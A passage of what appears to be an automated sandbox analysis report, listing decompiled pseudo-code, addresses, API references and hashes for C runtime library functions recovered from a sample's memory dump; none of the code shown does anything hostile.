					_t61 = _t60 + 0x1c3890;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t84 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t84[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t91 =  *_t84 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t67;
									if(_t91 > _t67) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t34 = _t92 + 0x1c3878; // 0x8040201
										 *(_t95 + _t91 + 0x19) =  *(_t95 + _t91 + 0x19) |  *_t34;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t67 = _t84[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t84 =  &(_t84[2]);
								__eflags =  *_t84;
								if( *_t84 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t92 = _t92 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t78;
					 *((intOrPtr*)(_t95 + 8)) = 1;
					 *((intOrPtr*)(_t95 + 0x21c)) = E001ACE19(_t78);
					_t46 = _t95 + 0xc; // 0xc
					_t85 = _t46;
					_t90 = _v36 + 0x1c3884;
					_t93 = 6;
					do {
						_t64 =  *_t90;
						_t90 = _t90 + 2;
						 *_t85 = _t64;
						_t85 = _t85 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L9;
				}
				L38:
				return E00197F14(_t55, _t78, _v8 ^ _t96, _t89, _t92, _t95);
			}

0x001ad2bc
0x001ad2c4
0x001ad2cb
0x001ad2d0
0x001ad2dc
0x001ad2e1
0x001ad497
0x001ad498
0x00000000
0x001ad2e7
0x001ad2e7
0x001ad2e9
0x001ad2eb
0x001ad2ed
0x001ad2f0
0x001ad2fc
0x001ad2fd
0x001ad300
0x001ad308
0x00000000
0x001ad30a
0x001ad310
0x001ad3e7
0x001ad3e7
0x001ad316
0x001ad31a
0x001ad322
0x00000000
0x001ad328
0x001ad32f
0x001ad35c
0x001ad362
0x001ad364
0x001ad3db
0x001ad3e1
0x00000000
0x00000000
0x00000000
0x00000000
0x001ad366
0x001ad36b
0x001ad370
0x001ad378
0x001ad37b
0x001ad37f
0x001ad385
0x001ad387
0x001ad38b
0x001ad38e
0x001ad390
0x001ad390
0x001ad393
0x001ad395
0x00000000
0x00000000
0x001ad397
0x001ad39a
0x001ad3a5
0x001ad3a5
0x001ad3a7
0x00000000
0x00000000
0x001ad39f
0x001ad3a4
0x001ad3a4
0x001ad3a4
0x001ad3a9
0x001ad3ac
0x001ad3af
0x00000000
0x00000000
0x00000000
0x001ad3af
0x001ad390
0x001ad3b1
0x001ad3b1
0x001ad3b1
0x001ad3b4
0x001ad3b9
0x001ad3b9
0x001ad3bc
0x001ad3bd
0x001ad3bd
0x001ad3bd
0x001ad3cc
0x001ad3d5
0x001ad3d5
0x00000000
0x001ad385
0x001ad331
0x001ad331
0x001ad334
0x001ad33a
0x001ad33d
0x001ad341
0x001ad341
0x001ad346
0x001ad346
0x001ad349
0x001ad34a
0x001ad34b
0x001ad34c
0x001ad34d
0x001ad49d
0x001ad49d
0x001ad49f
0x001ad32f
0x001ad322
0x001ad310
0x00000000
0x001ad308
0x001ad3f4
0x001ad3f9
0x001ad401
0x001ad401
0x001ad405
0x001ad408
0x001ad40e
0x001ad411
0x001ad411
0x001ad414
0x001ad416
0x001ad418
0x001ad418
0x001ad41b
0x001ad41d
0x00000000
0x00000000
0x001ad41f
0x001ad422
0x001ad43e
0x001ad43e
0x001ad440
0x00000000
0x00000000
0x001ad427
0x001ad42d
0x001ad42f
0x001ad435
0x001ad439
0x001ad439
0x001ad43a
0x00000000
0x001ad43a
0x00000000
0x001ad42d
0x001ad442
0x001ad445
0x001ad448
0x00000000
0x00000000
0x00000000
0x001ad448
0x001ad44a
0x001ad44a
0x001ad44d
0x001ad44e
0x001ad451
0x001ad454
0x001ad454
0x001ad45a
0x001ad45d
0x001ad46c
0x001ad475
0x001ad475
0x001ad47a
0x001ad480
0x001ad481
0x001ad481
0x001ad484
0x001ad487
0x001ad48a
0x001ad48d
0x001ad48d
0x001ad48d
0x00000000
0x001ad492
0x001ad4a0
0x001ad4ae

APIs

Part of subcall function 001ACE57: GetOEMCP.KERNEL32(00000000,001AD0C8,00000000,00000000,001A8943,001A8943,00000000,00000000,00000000), ref: 001ACE82

IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,?,?,001AD10F,00000000,00000000,00000000,?,00000000,?,?,?,001A8943), ref: 001AD31A
GetCPInfo.KERNEL32(00000000,001AD10F,?,?,001AD10F,00000000,00000000,00000000,?,00000000,?,?,?,001A8943,00000000,00000000), ref: 001AD35C

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 9fda9affd19c9b30b2342bb4f2f68358e525f487d920c0616c58230387977a8b
Instruction ID: 8fcba85022b26551411d2f84d2cbdfc266082a3cf9e170f90a9a9dd0876b06c5
Opcode Fuzzy Hash: 9fda9affd19c9b30b2342bb4f2f68358e525f487d920c0616c58230387977a8b
Instruction Fuzzy Hash: 2B5147B8A00B449EDB218F76D4406BABBF5FF96304F14806EE097C7A52D734E941CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001AD0AD Relevance: 3.1, APIs: 2, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E001AD0AD(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t37;
				signed int _t42;
				signed int _t46;
				char _t49;
				char _t56;
				signed int _t62;
				void* _t73;
				void* _t79;
				signed int _t84;

				_t77 = __edx;
				_push(_a16);
				_push(_a12);
				E001AD1C1(__ebx, __edx, __edi, __esi, __eflags);
				_t37 = E001ACE57(__eflags, _a4);
				_v16 = _t37;
				if(_t37 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t79 = E001A871A(0x220);
					_t62 = __ebx | 0xffffffff;
					__eflags = _t79;
					if(__eflags == 0) {
						L5:
						_t84 = _t62;
					} else {
						_t79 = memcpy(_t79,  *(_a12 + 0x48), 0x88 << 2);
						 *_t79 =  *_t79 & 0x00000000; // executed
						_t42 = E001AD2BC(_t77, __eflags, _v16, _t79); // executed
						_t84 = _t42;
						__eflags = _t84 - _t62;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E001A37C5();
							}
							asm("lock xadd [eax], ebx");
							_t64 = _t62 == 1;
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								_t56 = _a12;
								__eflags =  *((intOrPtr*)(_t56 + 0x48)) - 0x1c3450;
								if( *((intOrPtr*)(_t56 + 0x48)) != 0x1c3450) {
									E001A71B2( *((intOrPtr*)(_t56 + 0x48)));
								}
							}
							 *_t79 = 1;
							_t73 = _t79;
							_t79 = 0;
							 *(_a12 + 0x48) = _t73;
							_t46 =  *0x1c3280; // 0xfffffffe
							__eflags =  *(_a12 + 0x350) & _t46;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t49 = 5;
								_v16 = _t49;
								_v12 = _t49;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E001ACD49(_t64, 0, _t84, __eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x1c3264 =  *_a16;
								}
							}
						} else {
							 *((intOrPtr*)(E0019FD24(__eflags))) = 0x16;
							goto L5;
						}
					}
					E001A71B2(_t79);
					return _t84;
				} else {
					return 0;
				}
			}

0x001ad0ad
0x001ad0b5
0x001ad0b8
0x001ad0bb
0x001ad0c3
0x001ad0ce
0x001ad0d7
0x001ad0dd
0x001ad0de
0x001ad0df
0x001ad0ea
0x001ad0ec
0x001ad0f0
0x001ad0f2
0x001ad122
0x001ad122
0x001ad0f4
0x001ad101
0x001ad107
0x001ad10a
0x001ad10f
0x001ad113
0x001ad115
0x001ad132
0x001ad136
0x001ad138
0x001ad138
0x001ad143
0x001ad147
0x001ad147
0x001ad148
0x001ad14a
0x001ad14d
0x001ad154
0x001ad159
0x001ad15e
0x001ad154
0x001ad15f
0x001ad165
0x001ad16a
0x001ad16c
0x001ad172
0x001ad177
0x001ad17d
0x001ad182
0x001ad18d
0x001ad190
0x001ad191
0x001ad194
0x001ad19a
0x001ad19e
0x001ad1a2
0x001ad1a3
0x001ad1a8
0x001ad1ac
0x001ad1b7
0x001ad1b7
0x001ad1ac
0x001ad117
0x001ad11c
0x00000000
0x001ad11c
0x001ad115
0x001ad125
0x001ad131
0x001ad0d9
0x001ad0dc
0x001ad0dc

APIs

Part of subcall function 001ACE57: GetOEMCP.KERNEL32(00000000,001AD0C8,00000000,00000000,001A8943,001A8943,00000000,00000000,00000000), ref: 001ACE82

_free.LIBCMT ref: 001AD125

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 2a738882fa2f9e1d54dc7438e7c4736fa442c54f08c2a4e10d27504195b65100
Instruction ID: 92380c7b19f841f27785019c0f664ee7515618fbf66a99e3302814758c2f4a10
Opcode Fuzzy Hash: 2a738882fa2f9e1d54dc7438e7c4736fa442c54f08c2a4e10d27504195b65100
Instruction Fuzzy Hash: F9318F79900209AFCF11DFA8E840ADA77F5FF56310F11406AF9159B2A1EB32DD50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001A85E9 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E001A85E9(intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				void* _t20;
				intOrPtr* _t22;

				_t22 = E001A811F();
				if(_t22 == 0) {
					return LCMapStringW(E001A8646(_a4, 0), _a8, _a12, _a16, _a20, _a24);
				}
				 *0x1b4134(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36); // executed
				_t20 =  *_t22(); // executed
				return _t20;
			}

0x001a85f4
0x001a85f8
0x00000000
0x001a863b
0x001a8617
0x001a861d
0x00000000

APIs

LCMapStringEx.KERNELBASE(?,001A7E36,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 001A861D
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,001A7E36,?,?,00000000,?,00000000), ref: 001A863B

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: d427fbf40cefa24fe00261eef2b55b483a1beffae5ea7dcd501320781e1ad09b
Instruction ID: 5e841fe1a4e8386e7d12ff004db7bb596891371e2d59d5aed369e1326afba23e
Opcode Fuzzy Hash: d427fbf40cefa24fe00261eef2b55b483a1beffae5ea7dcd501320781e1ad09b
Instruction Fuzzy Hash: ACF0763640021ABBCF126F94DD05DDE3F26EF593A0F058110FA1966021CB32D872AB94

Uniqueness

Uniqueness Score: -1.00%

Function 001A2DB5 Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E001A2DB5(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t13;
				signed int _t14;

				if( *0x1f0cd8 == 0) {
					_push(_t13);
					E001AD261(__ebx); // executed
					_t2 = E001AD555(__ecx); // executed
					_t17 = _t2;
					if(_t2 != 0) {
						_t3 = E001A2E08(__ebx, _t17);
						if(_t3 != 0) {
							 *0x1f0ce4 = _t3;
							_t14 = 0;
							 *0x1f0cd8 = _t3;
						} else {
							_t14 = _t13 | 0xffffffff;
						}
						E001A71B2(0);
					} else {
						_t14 = _t13 | 0xffffffff;
					}
					E001A71B2(_t17);
					return _t14;
				} else {
					return 0;
				}
			}

0x001a2dbc
0x001a2dc2
0x001a2dc3
0x001a2dc8
0x001a2dcd
0x001a2dd1
0x001a2dd9
0x001a2de1
0x001a2de8
0x001a2ded
0x001a2def
0x001a2de3
0x001a2de3
0x001a2de3
0x001a2df6
0x001a2dd3
0x001a2dd3
0x001a2dd3
0x001a2dfd
0x001a2e07
0x001a2dbe
0x001a2dc0
0x001a2dc0

APIs

_free.LIBCMT ref: 001A2DFD

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 13af8021bd4f69cd8d0aa76a3fa805690c53f7d00ab0bf9691cb39f29032fe91
Instruction ID: a1839a3b72d4ad6b5070ccfd29823c6b3c70b62ce01fda86c4dec38ce1db3aae
Opcode Fuzzy Hash: 13af8021bd4f69cd8d0aa76a3fa805690c53f7d00ab0bf9691cb39f29032fe91
Instruction Fuzzy Hash: 7CE0222EA0A91102D337A77D7C4177A0AA58FD3331F220326F820D66D3DF3488C6D0A5

Uniqueness

Uniqueness Score: -1.00%

Function 001A0A0D Relevance: 1.6, APIs: 1, Instructions: 117
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E001A0A0D(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v16;
				char _v20;
				void* __edi;
				signed int _t23;
				void* _t27;
				void* _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t37;
				signed int _t39;
				signed int _t43;
				void* _t48;
				void* _t68;
				void* _t71;
				signed int _t76;

				_t70 = __esi;
				_t68 = __edx;
				_t47 = __ebx;
				_t23 =  *0x1c3014; // 0x88921fa2
				_v8 = _t23 ^ _t76;
				_t69 = _a8;
				if(( *(_a8 + 0xc) >> 0x0000000c & 0x00000001) == 0) {
					_push(__ebx);
					_push(__esi);
					_t27 = E001A91AE(_t69);
					_t48 = 0x1c3288;
					if(_t27 == 0xffffffff || E001A91AE(_t69) == 0xfffffffe) {
						_t28 = _t48;
					} else {
						_t43 = E001A91AE(_t69);
						_t28 =  *((intOrPtr*)(0x1f0e18 + (_t43 >> 6) * 4)) + (E001A91AE(_t69) & 0x0000003f) * 0x38;
					}
					_t9 = _t28 + 0x29; // 0xa0a0a00
					_t29 =  *_t9;
					if(_t29 == 2 || _t29 == 1) {
						L18:
						_t30 = E001A09DD(_a4, _t69);
					} else {
						if(E001A91AE(_t69) != 0xffffffff && E001A91AE(_t69) != 0xfffffffe) {
							_t39 = E001A91AE(_t69);
							_t48 =  *((intOrPtr*)(0x1f0e18 + (_t39 >> 6) * 4)) + (E001A91AE(_t69) & 0x0000003f) * 0x38;
						}
						if( *((char*)(_t48 + 0x28)) >= 0) {
							goto L18;
						} else {
							if(E001A9695( &_v20,  &_v16, 5, _a4) != 0) {
								L17:
								_t30 = 0xffff;
							} else {
								_t71 = 0;
								if(_v20 <= 0) {
									L16:
									_t30 = _a4;
								} else {
									while(1) {
										_t37 = E001A96B2( *((char*)(_t76 + _t71 - 0xc)), _t69); // executed
										if(_t37 == 0xffffffff) {
											goto L17;
										}
										_t71 = _t71 + 1;
										if(_t71 < _v20) {
											continue;
										} else {
											goto L16;
										}
										goto L19;
									}
									goto L17;
								}
							}
						}
					}
					L19:
					_pop(_t70);
					_pop(_t47);
				} else {
					_t30 = E001A09DD(_a4, _t69);
				}
				return E00197F14(_t30, _t47, _v8 ^ _t76, _t68, _t69, _t70);
			}

0x001a0a0d
0x001a0a0d
0x001a0a0d
0x001a0a15
0x001a0a1c
0x001a0a20
0x001a0a2c
0x001a0a3e
0x001a0a3f
0x001a0a41
0x001a0a46
0x001a0a4f
0x001a0a81
0x001a0a5d
0x001a0a5e
0x001a0a7d
0x001a0a7d
0x001a0a83
0x001a0a83
0x001a0a88
0x001a0b1c
0x001a0b20
0x001a0a96
0x001a0aa0
0x001a0aaf
0x001a0ace
0x001a0ace
0x001a0ad4
0x00000000
0x001a0ad6
0x001a0aed
0x001a0b15
0x001a0b15
0x001a0aef
0x001a0aef
0x001a0af4
0x001a0b0f
0x001a0b0f
0x001a0af6
0x001a0af6
0x001a0afd
0x001a0b07
0x00000000
0x00000000
0x001a0b09
0x001a0b0d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001a0b0d
0x00000000
0x001a0af6
0x001a0af4
0x001a0aed
0x001a0ad4
0x001a0b27
0x001a0b27
0x001a0b28
0x001a0a2e
0x001a0a32
0x001a0a38
0x001a0b35

APIs

__cftof.LIBCMT ref: 001A0AE3

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: __cftof
String ID:
API String ID: 1622813385-0
Opcode ID: f02fe894f868076c22cececa7b718bb1882dd3a8a9fdbf0b27bd4f925b5252dd
Instruction ID: 60abcd8bc2812e0cf5c1f50479c4647202612c0b29a3481bc3ff248501fe5077
Opcode Fuzzy Hash: f02fe894f868076c22cececa7b718bb1882dd3a8a9fdbf0b27bd4f925b5252dd
Instruction Fuzzy Hash: B8313B3E5442146AD71A67389D46E7E77A89F6F734F24021EF4249B0D2EB34DC8386A0

Uniqueness

Uniqueness Score: -1.00%

Function 00196CFB Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00196CFB(void* __ecx, signed int* __edx, void* __esi, signed short _a4) {
				signed int _v8;
				char _v40;
				char _v42;
				signed short _v44;
				signed int _v48;
				char _v52;
				char _v56;
				void* __ebx;
				void* __edi;
				signed int _t33;
				signed int _t37;
				signed int _t40;
				signed int _t51;
				void* _t54;
				signed int _t55;
				signed int _t58;
				signed short _t60;
				signed int _t62;
				signed int* _t72;
				void* _t73;
				signed int _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;

				_t74 = __esi;
				_t72 = __edx;
				_t33 =  *0x1c3014; // 0x88921fa2
				_v8 = _t33 ^ _t80;
				_t60 = _a4;
				_t73 = __ecx;
				if(0xffff != _t60) {
					_push(__esi);
					_t62 =  *( *(__ecx + 0x20));
					__eflags = _t62;
					if(_t62 == 0) {
						L5:
						__eflags =  *(_t73 + 0x4c);
						if( *(_t73 + 0x4c) == 0) {
							L9:
							_t37 = 0xffff;
						} else {
							E00196979(_t73);
							_t40 =  *(_t73 + 0x38);
							_v48 = _t40;
							__eflags = _t40;
							if(__eflags != 0) {
								_v44 = _t60;
								 *0x1b4134(_t73 + 0x40,  &_v44,  &_v42,  &_v56,  &_v40,  &_v8,  &_v52);
								_t51 =  *((intOrPtr*)( *((intOrPtr*)( *_t40 + 0x1c))))();
								__eflags = _t51;
								if(_t51 == 0) {
									L16:
									_t77 = _v52 -  &_v40;
									__eflags = _t77;
									if(_t77 == 0) {
										L18:
										 *((char*)(_t73 + 0x3e)) = 1;
										__eflags = _v56 -  &_v44;
										if(_v56 ==  &_v44) {
											goto L9;
										} else {
											goto L19;
										}
									} else {
										_t54 = E001A1989(_t60, _t73, _t77,  &_v40, 1, _t77,  *(_t73 + 0x4c));
										__eflags = _t77 - _t54;
										if(_t77 != _t54) {
											goto L9;
										} else {
											goto L18;
										}
									}
								} else {
									_t55 = _t51 - 1;
									__eflags = _t55;
									if(_t55 == 0) {
										goto L16;
									} else {
										__eflags = _t55;
										if(__eflags != 0) {
											goto L9;
										} else {
											_push( *(_t73 + 0x4c));
											_push(_v44);
											goto L8;
										}
									}
								}
								L20:
							} else {
								_push( *(_t73 + 0x4c));
								_push(_t60); // executed
								L8:
								_t58 = E00196287(__eflags); // executed
								__eflags = _t58;
								_t37 = _t60 & 0x0000ffff;
								if(_t58 == 0) {
									goto L9;
								}
							}
						}
					} else {
						_t72 =  *(__ecx + 0x30);
						_t78 =  *_t72;
						__eflags = _t62 - _t62 + _t78 * 2;
						if(_t62 >= _t62 + _t78 * 2) {
							goto L5;
						} else {
							 *_t72 = _t78 - 1;
							_t72 =  *(__ecx + 0x20);
							_t79 =  *_t72;
							 *_t72 = _t79 + 2;
							 *_t79 = _t60;
							L19:
							_t37 = _t60;
						}
					}
					_pop(_t74);
				} else {
					_t37 = 0;
				}
				return E00197F14(_t37, _t60, _v8 ^ _t80, _t72, _t73, _t74);
				goto L20;
			}

0x00196cfb
0x00196cfb
0x00196d01
0x00196d08
0x00196d0c
0x00196d15
0x00196d1a
0x00196d23
0x00196d24
0x00196d26
0x00196d28
0x00196d4d
0x00196d4d
0x00196d51
0x00196d76
0x00196d76
0x00196d53
0x00196d55
0x00196d5a
0x00196d5d
0x00196d60
0x00196d62
0x00196d8c
0x00196db3
0x00196dbe
0x00196dbe
0x00196dc1
0x00196dd6
0x00196ddc
0x00196ddc
0x00196dde
0x00196df3
0x00196df6
0x00196dfa
0x00196dfd
0x00000000
0x00000000
0x00000000
0x00000000
0x00196de0
0x00196de7
0x00196def
0x00196df1
0x00000000
0x00000000
0x00000000
0x00000000
0x00196df1
0x00196dc3
0x00196dc3
0x00196dc3
0x00196dc6
0x00000000
0x00196dc8
0x00196dc9
0x00196dcc
0x00000000
0x00196dce
0x00196dce
0x00196dd1
0x00000000
0x00196dd1
0x00196dcc
0x00196dc6
0x00000000
0x00196d64
0x00196d64
0x00196d67
0x00196d68
0x00196d68
0x00196d6e
0x00196d70
0x00196d74
0x00000000
0x00000000
0x00196d74
0x00196d62
0x00196d2a
0x00196d2a
0x00196d2d
0x00196d32
0x00196d34
0x00000000
0x00196d36
0x00196d39
0x00196d3b
0x00196d3e
0x00196d43
0x00196d45
0x00196e03
0x00196e03
0x00196e03
0x00196d34
0x00196d7b
0x00196d1c
0x00196d1c
0x00196d1c
0x00196d89
0x00000000

APIs

_Fputc.LIBCPMT ref: 00196D68

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: Fputc
String ID:
API String ID: 3078413507-0
Opcode ID: b6265803c8884bc9cc373dc5fbaa1e66a8e29e42e49c6e9072e88f7a839b60c8
Instruction ID: a8c863aa291e70f278b4a30b4d4bebcd006593425ddf7ba12368336c61f56003
Opcode Fuzzy Hash: b6265803c8884bc9cc373dc5fbaa1e66a8e29e42e49c6e9072e88f7a839b60c8
Instruction Fuzzy Hash: 35317C71A0051AEBCF14DFA8C5908EEB7F8FF19314B14412AE552E7650EB35ED44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001AD972 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E001AD972(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E001A58A2(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E001A8527(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *(_t32 + 0xd) =  *(_t32 + 0xd) & 0x000000f8;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E001A71B2(0);
				return _t35;
			}

0x001ad978
0x001ad97f
0x001ad984
0x001ad988
0x001ad98f
0x001ad995
0x001ad995
0x001ad99b
0x001ad99d
0x001ad9a0
0x001ad9a0
0x001ad9a3
0x001ad9a5
0x001ad9ab
0x001ad9af
0x001ad9b4
0x001ad9b8
0x001ad9bc
0x001ad9be
0x001ad9c1
0x001ad9c7
0x001ad9ce
0x001ad9d2
0x001ad9d5
0x001ad9d8
0x001ad9d8
0x001ad9dc
0x001ad9df
0x001ad991
0x001ad991
0x001ad991
0x001ad9e1
0x001ad9ec

APIs

Part of subcall function 001A58A2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001A5F13,00000001,00000364,00000002,000000FF,?,?,00198B75,?), ref: 001A58E3

_free.LIBCMT ref: 001AD9E1

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
